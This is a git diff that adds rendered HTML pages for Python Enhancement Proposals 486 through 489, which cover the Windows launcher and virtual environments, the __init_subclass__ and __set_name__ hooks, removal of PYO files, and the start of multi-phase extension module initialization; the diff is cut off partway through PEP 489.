+ + + + + \ No newline at end of file diff --git a/pep-0486/index.html b/pep-0486/index.html new file mode 100644 index 00000000000..7a6b8d0e604 --- /dev/null +++ b/pep-0486/index.html @@ -0,0 +1,251 @@ + + + + + + + + PEP 486 – Make the Python Launcher aware of virtual environments | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 486 – Make the Python Launcher aware of virtual environments

+
+
Author:
+
Paul Moore <p.f.moore at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Feb-2015
+
Python-Version:
+
3.5
+
Post-History:
+
12-Feb-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The Windows installers for Python include a launcher that locates the +correct Python interpreter to run (see PEP 397). However, the +launcher is not aware of virtual environments (virtualenv [1] or PEP +405 based), and so cannot be used to run commands from the active +virtualenv.

+

This PEP proposes making the launcher “virtualenv aware”. This means +that when run without specifying an explicit Python interpreter to +use, the launcher will use the currently active virtualenv, if any, +before falling back to the configured default Python.

+
+
+

Rationale

+

Windows users with multiple copies of Python installed need a means of +selecting which one to use. The Python launcher provides this +facility by means of a py command that can be used to run either a +configured “default” Python or a specific interpreter, by means of +command line arguments. So typical usage would be:

+
# Run the Python interactive interpreter
+py
+
+# Execute an installed module
+py -m pip install pytest
+py -m pytest
+
+
+

When using virtual environments, the py launcher is unaware that a +virtualenv is active, and will continue to use the system Python. So +different command invocations are needed to run the same commands in a +virtualenv:

+
# Run the Python interactive interpreter
+python
+
+# Execute an installed module (these could use python -m,
+# which is longer to type but is a little more similar to the
+# launcher approach)
+pip install pytest
+py.test
+
+
+

Having to use different commands is error-prone, and in many cases +the error is difficult to spot immediately. The PEP proposes making +the py command usable with virtual environments, so that the first +form of command can be used in all cases.

+
+
+

Implementation

+

Both virtualenv and the core venv module set an environment +variable VIRTUAL_ENV when activating a virtualenv. This PEP +proposes that the launcher checks for the VIRTUAL_ENV environment +variable whenever it would run the “default” Python interpreter for +the system (i.e., when no specific version flags such as py -2.7 +are used) and if present, run the Python interpreter for the +virtualenv rather than the default system Python.

+

The “default” Python interpreter referred to above is (as per PEP 397) +either the latest version of Python installed on the system, or +a version configured via the py.ini configuration file. When the +user specifies an explicit Python version on the command line, this +will always be used (as at present).

+
+
+

Impact on Script Launching

+

As well as interactive use, the launcher is used as the Windows file +association for Python scripts. In that case, a “shebang” (#!) +line at the start of the script is used to identify the interpreter to +run. A fully-qualified path can be used, or a version-specific Python +(python3 or python2, or even python3.5), or the generic +python, which means to use the default interpreter.

+

The launcher also looks for the specific shebang line +#!/usr/bin/env python. On Unix, the env program searches for a +command on $PATH and runs the command so located. Similarly, with +this shebang line, the launcher will look for a copy of python.exe +on the user’s current %PATH% and will run that copy.

+

As activating a virtualenv means that it is added to PATH, no +special handling is needed to run scripts with the active virtualenv - +they just need to use the #!/usr/bin/env python shebang line, +exactly as on Unix. (If there is no activated virtualenv, and no +python.exe on PATH, the launcher will look for a default +Python exactly as if the shebang line had said #!python).

+
+
+

Exclusions

+

The PEP makes no attempt to promote the use of the launcher for +running Python on Windows. Most existing documentation assumes the +user of python as the command to run Python, and (for example) +pip to run an installed Python command. This documentation is not +expected to change, and users who choose to manage their PATH +environment variable can continue to use this form. The focus of this +PEP is purely on allowing users who prefer to use the launcher when +dealing with their system Python installations, to be able to continue +to do so when using virtual environments.

+
+
+

Reference Implementation

+

A patch implementing the proposed behaviour is available at +http://bugs.python.org/issue23465

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0486.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0487/index.html b/pep-0487/index.html new file mode 100644 index 00000000000..152773eae7c --- /dev/null +++ b/pep-0487/index.html @@ -0,0 +1,579 @@ + + + + + + + + PEP 487 – Simpler customisation of class creation | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 487 – Simpler customisation of class creation

+
+
Author:
+
Martin Teichmann <lkb.teichmann at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Feb-2015
+
Python-Version:
+
3.6
+
Post-History:
+
27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016
+
Replaces:
+
422
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Currently, customising class creation requires the use of a custom metaclass. +This custom metaclass then persists for the entire lifecycle of the class, +creating the potential for spurious metaclass conflicts.

+

This PEP proposes to instead support a wide range of customisation +scenarios through a new __init_subclass__ hook in the class body, +and a hook to initialize attributes.

+

The new mechanism should be easier to understand and use than +implementing a custom metaclass, and thus should provide a gentler +introduction to the full power of Python’s metaclass machinery.

+
+
+

Background

+

Metaclasses are a powerful tool to customize class creation. They have, +however, the problem that there is no automatic way to combine metaclasses. +If one wants to use two metaclasses for a class, a new metaclass combining +those two needs to be created, typically manually.

+

This need often occurs as a surprise to a user: inheriting from two base +classes coming from two different libraries suddenly raises the necessity +to manually create a combined metaclass, where typically one is not +interested in those details about the libraries at all. This becomes +even worse if one library starts to make use of a metaclass which it +has not done before. While the library itself continues to work perfectly, +suddenly every code combining those classes with classes from another library +fails.

+
+
+

Proposal

+

While there are many possible ways to use a metaclass, the vast majority +of use cases falls into just three categories: some initialization code +running after class creation, the initialization of descriptors and +keeping the order in which class attributes were defined.

+

The first two categories can easily be achieved by having simple hooks +into the class creation:

+
    +
  1. An __init_subclass__ hook that initializes +all subclasses of a given class.
  2. +
  3. upon class creation, a __set_name__ hook is called on all the +attribute (descriptors) defined in the class, and
  4. +
+

The third category is the topic of another PEP, PEP 520.

+

As an example, the first use case looks as follows:

+
>>> class QuestBase:
+...    # this is implicitly a @classmethod (see below for motivation)
+...    def __init_subclass__(cls, swallow, **kwargs):
+...        cls.swallow = swallow
+...        super().__init_subclass__(**kwargs)
+
+>>> class Quest(QuestBase, swallow="african"):
+...    pass
+
+>>> Quest.swallow
+'african'
+
+
+

The base class object contains an empty __init_subclass__ +method which serves as an endpoint for cooperative multiple inheritance. +Note that this method has no keyword arguments, meaning that all +methods which are more specialized have to process all keyword +arguments.

+

This general proposal is not a new idea (it was first suggested for +inclusion in the language definition more than 10 years ago, and a +similar mechanism has long been supported by Zope’s ExtensionClass), +but the situation has changed sufficiently in recent years that +the idea is worth reconsidering for inclusion.

+

The second part of the proposal adds an __set_name__ +initializer for class attributes, especially if they are descriptors. +Descriptors are defined in the body of a +class, but they do not know anything about that class, they do not +even know the name they are accessed with. They do get to know their +owner once __get__ is called, but still they do not know their +name. This is unfortunate, for example they cannot put their +associated value into their object’s __dict__ under their name, +since they do not know that name. This problem has been solved many +times, and is one of the most important reasons to have a metaclass in +a library. While it would be easy to implement such a mechanism using +the first part of the proposal, it makes sense to have one solution +for this problem for everyone.

+

To give an example of its usage, imagine a descriptor representing weak +referenced values:

+
import weakref
+
+class WeakAttribute:
+    def __get__(self, instance, owner):
+        return instance.__dict__[self.name]()
+
+    def __set__(self, instance, value):
+        instance.__dict__[self.name] = weakref.ref(value)
+
+    # this is the new initializer:
+    def __set_name__(self, owner, name):
+        self.name = name
+
+
+

Such a WeakAttribute may, for example, be used in a tree structure +where one wants to avoid cyclic references via the parent:

+
class TreeNode:
+    parent = WeakAttribute()
+
+    def __init__(self, parent):
+        self.parent = parent
+
+
+

Note that the parent attribute is used like a normal attribute, +yet the tree contains no cyclic references and can thus be easily +garbage collected when out of use. The parent attribute magically +becomes None once the parent ceases existing.

+

While this example looks very trivial, it should be noted that until +now such an attribute cannot be defined without the use of a metaclass. +And given that such a metaclass can make life very hard, this kind of +attribute does not exist yet.

+

Initializing descriptors could simply be done in the +__init_subclass__ hook. But this would mean that descriptors can +only be used in classes that have the proper hook, the generic version +like in the example would not work generally. One could also call +__set_name__ from within the base implementation of +object.__init_subclass__. But given that it is a common mistake +to forget to call super(), it would happen too often that suddenly +descriptors are not initialized.

+
+
+

Key Benefits

+
+

Easier inheritance of definition time behaviour

+

Understanding Python’s metaclasses requires a deep understanding of +the type system and the class construction process. This is legitimately +seen as challenging, due to the need to keep multiple moving parts (the code, +the metaclass hint, the actual metaclass, the class object, instances of the +class object) clearly distinct in your mind. Even when you know the rules, +it’s still easy to make a mistake if you’re not being extremely careful.

+

Understanding the proposed implicit class initialization hook only requires +ordinary method inheritance, which isn’t quite as daunting a task. The new +hook provides a more gradual path towards understanding all of the phases +involved in the class definition process.

+
+
+

Reduced chance of metaclass conflicts

+

One of the big issues that makes library authors reluctant to use metaclasses +(even when they would be appropriate) is the risk of metaclass conflicts. +These occur whenever two unrelated metaclasses are used by the desired +parents of a class definition. This risk also makes it very difficult to +add a metaclass to a class that has previously been published without one.

+

By contrast, adding an __init_subclass__ method to an existing type poses +a similar level of risk to adding an __init__ method: technically, there +is a risk of breaking poorly implemented subclasses, but when that occurs, +it is recognised as a bug in the subclass rather than the library author +breaching backwards compatibility guarantees.

+
+
+
+

New Ways of Using Classes

+
+

Subclass registration

+

Especially when writing a plugin system, one likes to register new +subclasses of a plugin baseclass. This can be done as follows:

+
class PluginBase:
+    subclasses = []
+
+    def __init_subclass__(cls, **kwargs):
+        super().__init_subclass__(**kwargs)
+        cls.subclasses.append(cls)
+
+
+

In this example, PluginBase.subclasses will contain a plain list of all +subclasses in the entire inheritance tree. One should note that this also +works nicely as a mixin class.

+
+
+

Trait descriptors

+

There are many designs of Python descriptors in the wild which, for +example, check boundaries of values. Often those “traits” need some support +of a metaclass to work. This is how this would look like with this +PEP:

+
class Trait:
+    def __init__(self, minimum, maximum):
+        self.minimum = minimum
+        self.maximum = maximum
+
+    def __get__(self, instance, owner):
+        return instance.__dict__[self.key]
+
+    def __set__(self, instance, value):
+        if self.minimum < value < self.maximum:
+            instance.__dict__[self.key] = value
+        else:
+            raise ValueError("value not in range")
+
+    def __set_name__(self, owner, name):
+        self.key = name
+
+
+
+
+
+

Implementation Details

+

The hooks are called in the following order: type.__new__ calls +the __set_name__ hooks on the descriptor after the new class has been +initialized. Then it calls __init_subclass__ on the base class, on +super(), to be precise. This means that subclass initializers already +see the fully initialized descriptors. This way, __init_subclass__ users +can fix all descriptors again if this is needed.

+

Another option would have been to call __set_name__ in the base +implementation of object.__init_subclass__. This way it would be possible +even to prevent __set_name__ from being called. Most of the times, +however, such a prevention would be accidental, as it often happens that a call +to super() is forgotten.

+

As a third option, all the work could have been done in type.__init__. +Most metaclasses do their work in __new__, as this is recommended by +the documentation. Many metaclasses modify their arguments before they +pass them over to super().__new__. For compatibility with those kind +of classes, the hooks should be called from __new__.

+

Another small change should be done: in the current implementation of +CPython, type.__init__ explicitly forbids the use of keyword arguments, +while type.__new__ allows for its attributes to be shipped as keyword +arguments. This is weirdly incoherent, and thus it should be forbidden. +While it would be possible to retain the current behavior, it would be better +if this was fixed, as it is probably not used at all: the only use case would +be that at metaclass calls its super().__new__ with name, bases and +dict (yes, dict, not namespace or ns as mostly used with modern +metaclasses) as keyword arguments. This should not be done. This little +change simplifies the implementation of this PEP significantly, while +improving the coherence of Python overall.

+

As a second change, the new type.__init__ just ignores keyword +arguments. Currently, it insists that no keyword arguments are given. This +leads to a (wanted) error if one gives keyword arguments to a class declaration +if the metaclass does not process them. Metaclass authors that do want to +accept keyword arguments must filter them out by overriding __init__.

+

In the new code, it is not __init__ that complains about keyword arguments, +but __init_subclass__, whose default implementation takes no arguments. In +a classical inheritance scheme using the method resolution order, each +__init_subclass__ may take out it’s keyword arguments until none are left, +which is checked by the default implementation of __init_subclass__.

+

For readers who prefer reading Python over English, this PEP proposes to +replace the current type and object with the following:

+
class NewType(type):
+    def __new__(cls, *args, **kwargs):
+        if len(args) != 3:
+            return super().__new__(cls, *args)
+        name, bases, ns = args
+        init = ns.get('__init_subclass__')
+        if isinstance(init, types.FunctionType):
+            ns['__init_subclass__'] = classmethod(init)
+        self = super().__new__(cls, name, bases, ns)
+        for k, v in self.__dict__.items():
+            func = getattr(v, '__set_name__', None)
+            if func is not None:
+                func(self, k)
+        super(self, self).__init_subclass__(**kwargs)
+        return self
+
+    def __init__(self, name, bases, ns, **kwargs):
+        super().__init__(name, bases, ns)
+
+class NewObject(object):
+    @classmethod
+    def __init_subclass__(cls):
+        pass
+
+
+
+
+

Reference Implementation

+

The reference implementation for this PEP is attached to +issue 27366.

+
+
+

Backward compatibility issues

+

The exact calling sequence in type.__new__ is slightly changed, raising +fears of backwards compatibility. It should be assured by tests that common use +cases behave as desired.

+

The following class definitions (except the one defining the metaclass) +continue to fail with a TypeError as superfluous class arguments are passed:

+
class MyMeta(type):
+    pass
+
+class MyClass(metaclass=MyMeta, otherarg=1):
+    pass
+
+MyMeta("MyClass", (), otherargs=1)
+
+import types
+types.new_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
+types.prepare_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
+
+
+

A metaclass defining only a __new__ method which is interested in keyword +arguments now does not need to define an __init__ method anymore, as the +default type.__init__ ignores keyword arguments. This is nicely in line +with the recommendation to override __new__ in metaclasses instead of +__init__. The following code does not fail anymore:

+
class MyMeta(type):
+    def __new__(cls, name, bases, namespace, otherarg):
+        return super().__new__(cls, name, bases, namespace)
+
+class MyClass(metaclass=MyMeta, otherarg=1):
+    pass
+
+
+

Only defining an __init__ method in a metaclass continues to fail with +TypeError if keyword arguments are given:

+
class MyMeta(type):
+    def __init__(self, name, bases, namespace, otherarg):
+        super().__init__(name, bases, namespace)
+
+class MyClass(metaclass=MyMeta, otherarg=1):
+    pass
+
+
+

Defining both __init__ and __new__ continues to work fine.

+

About the only thing that stops working is passing the arguments of +type.__new__ as keyword arguments:

+
class MyMeta(type):
+    def __new__(cls, name, bases, namespace):
+        return super().__new__(cls, name=name, bases=bases,
+                               dict=namespace)
+
+class MyClass(metaclass=MyMeta):
+    pass
+
+
+

This will now raise TypeError, but this is weird code, and easy +to fix even if someone used this feature.

+
+
+

Rejected Design Options

+
+

Calling the hook on the class itself

+

Adding an __autodecorate__ hook that would be called on the class +itself was the proposed idea of PEP 422. Most examples work the same +way or even better if the hook is called only on strict subclasses. In general, +it is much easier to arrange to explicitly call the hook on the class in which it +is defined (to opt-in to such a behavior) than to opt-out (by remember to check for +cls is __class in the hook body), meaning that one does not want the hook to be +called on the class it is defined in.

+

This becomes most evident if the class in question is designed as a +mixin: it is very unlikely that the code of the mixin is to be +executed for the mixin class itself, as it is not supposed to be a +complete class on its own.

+

The original proposal also made major changes in the class +initialization process, rendering it impossible to back-port the +proposal to older Python versions.

+

When it’s desired to also call the hook on the base class, two mechanisms are available:

+
    +
  1. Introduce an additional mixin class just to hold the __init_subclass__ +implementation. The original “base” class can then list the new mixin as its +first parent class.
  2. +
  3. Implement the desired behaviour as an independent class decorator, and apply that +decorator explicitly to the base class, and then implicitly to subclasses via +__init_subclass__.
  4. +
+

Calling __init_subclass__ explicitly from a class decorator will generally be +undesirable, as this will also typically call __init_subclass__ a second time on +the parent class, which is unlikely to be desired behaviour.

+
+
+

Other variants of calling the hooks

+

Other names for the hook were presented, namely __decorate__ or +__autodecorate__. This proposal opts for __init_subclass__ as +it is very close to the __init__ method, just for the subclass, +while it is not very close to decorators, as it does not return the +class.

+

For the __set_name__ hook other names have been proposed as well, +__set_owner__, __set_ownership__ and __init_descriptor__.

+
+
+

Requiring an explicit decorator on __init_subclass__

+

One could require the explicit use of @classmethod on the +__init_subclass__ decorator. It was made implicit since there’s no +sensible interpretation for leaving it out, and that case would need +to be detected anyway in order to give a useful error message.

+

This decision was reinforced after noticing that the user experience of +defining __prepare__ and forgetting the @classmethod method +decorator is singularly incomprehensible (particularly since PEP 3115 +documents it as an ordinary method, and the current documentation doesn’t +explicitly say anything one way or the other).

+
+
+

A more __new__-like hook

+

In PEP 422 the hook worked more like the __new__ method than the +__init__ method, meaning that it returned a class instead of +modifying one. This allows a bit more flexibility, but at the cost +of much harder implementation and undesired side effects.

+
+
+

Adding a class attribute with the attribute order

+

This got its own PEP 520.

+
+
+
+

History

+

This used to be a competing proposal to PEP 422 by Alyssa Coghlan and Daniel +Urban. PEP 422 intended to achieve the same goals as this PEP, but with a +different way of implementation. In the meantime, PEP 422 has been withdrawn +favouring this approach.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0487.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0488/index.html b/pep-0488/index.html new file mode 100644 index 00000000000..2dfaee8af2b --- /dev/null +++ b/pep-0488/index.html @@ -0,0 +1,465 @@ + + + + + + + + PEP 488 – Elimination of PYO files | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 488 – Elimination of PYO files

+
+
Author:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
20-Feb-2015
+
Python-Version:
+
3.5
+
Post-History:
+
06-Mar-2015, +13-Mar-2015, +20-Mar-2015
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes eliminating the concept of PYO files from Python. +To continue the support of the separation of bytecode files based on +their optimization level, this PEP proposes extending the PYC file +name to include the optimization level in the bytecode repository +directory when there are optimizations applied.

+
+
+

Rationale

+

As of today, bytecode files come in two flavours: PYC and PYO. A PYC +file is the bytecode file generated and read from when no +optimization level is specified at interpreter startup (i.e., -O +is not specified). A PYO file represents the bytecode file that is +read/written when any optimization level is specified (i.e., when +-O or -OO is specified). This means that while PYC +files clearly delineate the optimization level used when they were +generated – namely no optimizations beyond the peepholer – the same +is not true for PYO files. To put this in terms of optimization +levels and the file extension:

+
    +
  • 0: .pyc
  • +
  • 1 (-O): .pyo
  • +
  • 2 (-OO): .pyo
  • +
+

The reuse of the .pyo file extension for both level 1 and 2 +optimizations means that there is no clear way to tell what +optimization level was used to generate the bytecode file. In terms +of reading PYO files, this can lead to an interpreter using a mixture +of optimization levels with its code if the user was not careful to +make sure all PYO files were generated using the same optimization +level (typically done by blindly deleting all PYO files and then +using the compileall module to compile all-new PYO files [1]). +This issue is only compounded when people optimize Python code beyond +what the interpreter natively supports, e.g., using the astoptimizer +project [2].

+

In terms of writing PYO files, the need to delete all PYO files +every time one either changes the optimization level they want to use +or are unsure of what optimization was used the last time PYO files +were generated leads to unnecessary file churn. The change proposed +by this PEP also allows for all optimization levels to be +pre-compiled for bytecode files ahead of time, something that is +currently impossible thanks to the reuse of the .pyo file +extension for multiple optimization levels.

+

As for distributing bytecode-only modules, having to distribute both +.pyc and .pyo files is unnecessary for the common use-case +of code obfuscation and smaller file deployments. This means that +bytecode-only modules will only load from their non-optimized +.pyc file name.

+
+
+

Proposal

+

To eliminate the ambiguity that PYO files present, this PEP proposes +eliminating the concept of PYO files and their accompanying .pyo +file extension. To allow for the optimization level to be unambiguous +as well as to avoid having to regenerate optimized bytecode files +needlessly in the __pycache__ directory, the optimization level +used to generate the bytecode file will be incorporated into the +bytecode file name. When no optimization level is specified, the +pre-PEP .pyc file name will be used (i.e., no optimization level +will be specified in the file name). For example, a source file named +foo.py in CPython 3.5 could have the following bytecode files +based on the interpreter’s optimization level (none, -O, and +-OO):

+
    +
  • 0: foo.cpython-35.pyc (i.e., no change)
  • +
  • 1: foo.cpython-35.opt-1.pyc
  • +
  • 2: foo.cpython-35.opt-2.pyc
  • +
+

Currently bytecode file names are created by +importlib.util.cache_from_source(), approximately using the +following expression defined by PEP 3147 [3], [4]:

+
'{name}.{cache_tag}.pyc'.format(name=module_name,
+                                cache_tag=sys.implementation.cache_tag)
+
+
+

This PEP proposes to change the expression when an optimization +level is specified to:

+
'{name}.{cache_tag}.opt-{optimization}.pyc'.format(
+        name=module_name,
+        cache_tag=sys.implementation.cache_tag,
+        optimization=str(sys.flags.optimize))
+
+
+

The “opt-” prefix was chosen so as to provide a visual separator +from the cache tag. The placement of the optimization level after +the cache tag was chosen to preserve lexicographic sort order of +bytecode file names based on module name and cache tag which will +not vary for a single interpreter. The “opt-” prefix was chosen over +“o” so as to be somewhat self-documenting. The “opt-” prefix was +chosen over “O” so as to not have any confusion in case “0” was the +leading prefix of the optimization level.

+

A period was chosen over a hyphen as a separator so as to distinguish +clearly that the optimization level is not part of the interpreter +version as specified by the cache tag. It also lends to the use of +the period in the file name to delineate semantically different +concepts.

+

For example, if -OO had been passed to the interpreter then +instead of importlib.cpython-35.pyo the file name would be +importlib.cpython-35.opt-2.pyc.

+

Leaving out the new opt- tag when no optimization level is +applied should increase backwards-compatibility. This is also more +understanding of Python implementations which have no use for +optimization levels (e.g., PyPy [10]).

+

It should be noted that this change in no way affects the performance +of import. Since the import system looks for a single bytecode file +based on the optimization level of the interpreter already and +generates a new bytecode file if it doesn’t exist, the introduction +of potentially more bytecode files in the __pycache__ directory +has no effect in terms of stat calls. The interpreter will continue +to look for only a single bytecode file based on the optimization +level and thus no increase in stat calls will occur.

+

The only potentially negative result of this PEP is the probable +increase in the number of .pyc files and thus increase in storage +use. But for platforms where this is an issue, +sys.dont_write_bytecode exists to turn off bytecode generation so +that it can be controlled offline.

+
+
+

Implementation

+

An implementation of this PEP is available [11].

+
+

importlib

+

As importlib.util.cache_from_source() is the API that exposes +bytecode file paths as well as being directly used by importlib, it +requires the most critical change. As of Python 3.4, the function’s +signature is:

+
importlib.util.cache_from_source(path, debug_override=None)
+
+
+

This PEP proposes changing the signature in Python 3.5 to:

+
importlib.util.cache_from_source(path, debug_override=None, *, optimization=None)
+
+
+

The introduced optimization keyword-only parameter will control +what optimization level is specified in the file name. If the +argument is None then the current optimization level of the +interpreter will be assumed (including no optimization). Any argument +given for optimization will be passed to str() and must have +str.isalnum() be true, else ValueError will be raised (this +prevents invalid characters being used in the file name). If the +empty string is passed in for optimization then the addition of +the optimization will be suppressed, reverting to the file name +format which predates this PEP.

+

It is expected that beyond Python’s own two optimization levels, +third-party code will use a hash of optimization names to specify the +optimization level, e.g. +hashlib.sha256(','.join(['no dead code', 'const folding'])).hexdigest(). +While this might lead to long file names, it is assumed that most +users never look at the contents of the __pycache__ directory and so +this won’t be an issue.

+

The debug_override parameter will be deprecated. A False +value will be equivalent to optimization=1 while a True +value will represent optimization='' (a None argument will +continue to mean the same as for optimization). A +deprecation warning will be raised when debug_override is given a +value other than None, but there are no plans for the complete +removal of the parameter at this time (but removal will be no later +than Python 4).

+

The various module attributes for importlib.machinery which relate to +bytecode file suffixes will be updated [7]. The +DEBUG_BYTECODE_SUFFIXES and OPTIMIZED_BYTECODE_SUFFIXES will +both be documented as deprecated and set to the same value as +BYTECODE_SUFFIXES (removal of DEBUG_BYTECODE_SUFFIXES and +OPTIMIZED_BYTECODE_SUFFIXES is not currently planned, but will be +not later than Python 4).

+

All various finders and loaders will also be updated as necessary, +but updating the previous mentioned parts of importlib should be all +that is required.

+
+
+

Rest of the standard library

+

The various functions exposed by the py_compile and +compileall functions will be updated as necessary to make sure +they follow the new bytecode file name semantics [6], [1]. The CLI +for the compileall module will not be directly affected (the +-b flag will be implicit as it will no longer generate .pyo +files when -O is specified).

+
+
+
+

Compatibility Considerations

+

Any code directly manipulating bytecode files from Python 3.2 on +will need to consider the impact of this change on their code (prior +to Python 3.2 – including all of Python 2 – there was no +__pycache__ which already necessitates bifurcating bytecode file +handling support). If code was setting the debug_override +argument to importlib.util.cache_from_source() then care will be +needed if they want the path to a bytecode file with an optimization +level of 2. Otherwise only code not using +importlib.util.cache_from_source() will need updating.

+

As for people who distribute bytecode-only modules (i.e., use a +bytecode file instead of a source file), they will have to choose +which optimization level they want their bytecode files to be since +distributing a .pyo file with a .pyc file will no longer be +of any use. Since people typically only distribute bytecode files for +code obfuscation purposes or smaller distribution size then only +having to distribute a single .pyc should actually be beneficial +to these use-cases. And since the magic number for bytecode files +changed in Python 3.5 to support PEP 465 there is no need to support +pre-existing .pyo files [8].

+
+
+

Rejected Ideas

+
+

Completely dropping optimization levels from CPython

+

Some have suggested that instead of accommodating the various +optimization levels in CPython, we should instead drop them +entirely. The argument is that significant performance gains would +occur from runtime optimizations through something like a JIT and not +through pre-execution bytecode optimizations.

+

This idea is rejected for this PEP as that ignores the fact that +there are people who do find the pre-existing optimization levels for +CPython useful. It also assumes that no other Python interpreter +would find what this PEP proposes useful.

+
+
+

Alternative formatting of the optimization level in the file name

+

Using the “opt-” prefix and placing the optimization level between +the cache tag and file extension is not critical. All options which +have been considered are:

+
    +
  • importlib.cpython-35.opt-1.pyc
  • +
  • importlib.cpython-35.opt1.pyc
  • +
  • importlib.cpython-35.o1.pyc
  • +
  • importlib.cpython-35.O1.pyc
  • +
  • importlib.cpython-35.1.pyc
  • +
  • importlib.cpython-35-O1.pyc
  • +
  • importlib.O1.cpython-35.pyc
  • +
  • importlib.o1.cpython-35.pyc
  • +
  • importlib.1.cpython-35.pyc
  • +
+

These were initially rejected either because they would change the +sort order of bytecode files, possible ambiguity with the cache tag, +or were not self-documenting enough. An informal poll was taken and +people clearly preferred the formatting proposed by the PEP [9]. +Since this topic is non-technical and of personal choice, the issue +is considered solved.

+
+
+

Embedding the optimization level in the bytecode metadata

+

Some have suggested that rather than embedding the optimization level +of bytecode in the file name that it be included in the file’s +metadata instead. This would mean every interpreter had a single copy +of bytecode at any time. Changing the optimization level would thus +require rewriting the bytecode, but there would also only be a single +file to care about.

+

This has been rejected due to the fact that Python is often installed +as a root-level application and thus modifying the bytecode file for +modules in the standard library are always possible. In this +situation integrators would need to guess at what a reasonable +optimization level was for users for any/all situations. By +allowing multiple optimization levels to co-exist simultaneously it +frees integrators from having to guess what users want and allows +users to utilize the optimization level they want.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0488.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0489/index.html b/pep-0489/index.html new file mode 100644 index 00000000000..227e66fd0f0 --- /dev/null +++ b/pep-0489/index.html @@ -0,0 +1,951 @@ + + + + + + + + PEP 489 – Multi-phase extension module initialization | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 489 – Multi-phase extension module initialization

+
+
Author:
+
Petr Viktorin <encukou at gmail.com>, +Stefan Behnel <stefan_ml at behnel.de>, +Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Import-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
11-Aug-2013
+
Python-Version:
+
3.5
+
Post-History:
+
23-Aug-2013, 20-Feb-2015, 16-Apr-2015, 07-May-2015, 18-May-2015
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a redesign of the way in which built-in and extension modules +interact with the import machinery. This was last revised for Python 3.0 in PEP +3121, but did not solve all problems at the time. The goal is to solve +import-related problems by bringing extension modules closer to the way Python +modules behave; specifically to hook into the ModuleSpec-based loading +mechanism introduced in PEP 451.

+

This proposal draws inspiration from PyType_Spec of PEP 384 to allow extension +authors to only define features they need, and to allow future additions +to extension module declarations.

+

Extensions modules are created in a two-step process, fitting better into +the ModuleSpec architecture, with parallels to __new__ and __init__ of classes.

+

Extension modules can safely store arbitrary C-level per-module state in +the module that is covered by normal garbage collection and supports +reloading and sub-interpreters. +Extension authors are encouraged to take these issues into account +when using the new API.

+

The proposal also allows extension modules with non-ASCII names.

+

Not all problems tackled in PEP 3121 are solved in this proposal. +In particular, problems with run-time module lookup (PyState_FindModule) +are left to a future PEP.

+
+
+

Motivation

+

Python modules and extension modules are not being set up in the same way. +For Python modules, the module object is created and set up first, then the +module code is being executed (PEP 302). +A ModuleSpec object (PEP 451) is used to hold information about the module, +and passed to the relevant hooks.

+

For extensions (i.e. shared libraries) and built-in modules, the module +init function is executed straight away and does both the creation and +initialization. The initialization function is not passed the ModuleSpec, +or any information it contains, such as the __file__ or fully-qualified +name. This hinders relative imports and resource loading.

+

In Py3, modules are also not being added to sys.modules, which means that a +(potentially transitive) re-import of the module will really try to re-import +it and thus run into an infinite loop when it executes the module init function +again. Without access to the fully-qualified module name, it is not trivial to +correctly add the module to sys.modules either. +This is specifically a problem for Cython generated modules, for which it’s +not uncommon that the module init code has the same level of complexity as +that of any ‘regular’ Python module. Also, the lack of __file__ and __name__ +information hinders the compilation of “__init__.py” modules, i.e. packages, +especially when relative imports are being used at module init time.

+

Furthermore, the majority of currently existing extension modules has +problems with sub-interpreter support and/or interpreter reloading, and, while +it is possible with the current infrastructure to support these +features, it is neither easy nor efficient. +Addressing these issues was the goal of PEP 3121, but many extensions, +including some in the standard library, took the least-effort approach +to porting to Python 3, leaving these issues unresolved. +This PEP keeps backwards compatibility, which should reduce pressure and give +extension authors adequate time to consider these issues when porting.

+
+
+

The current process

+

Currently, extension and built-in modules export an initialization function +named “PyInit_modulename”, named after the file name of the shared library. +This function is executed by the import machinery and must return a fully +initialized module object. +The function receives no arguments, so it has no way of knowing about its +import context.

+

During its execution, the module init function creates a module object +based on a PyModuleDef object. It then continues to initialize it by adding +attributes to the module dict, creating types, etc.

+

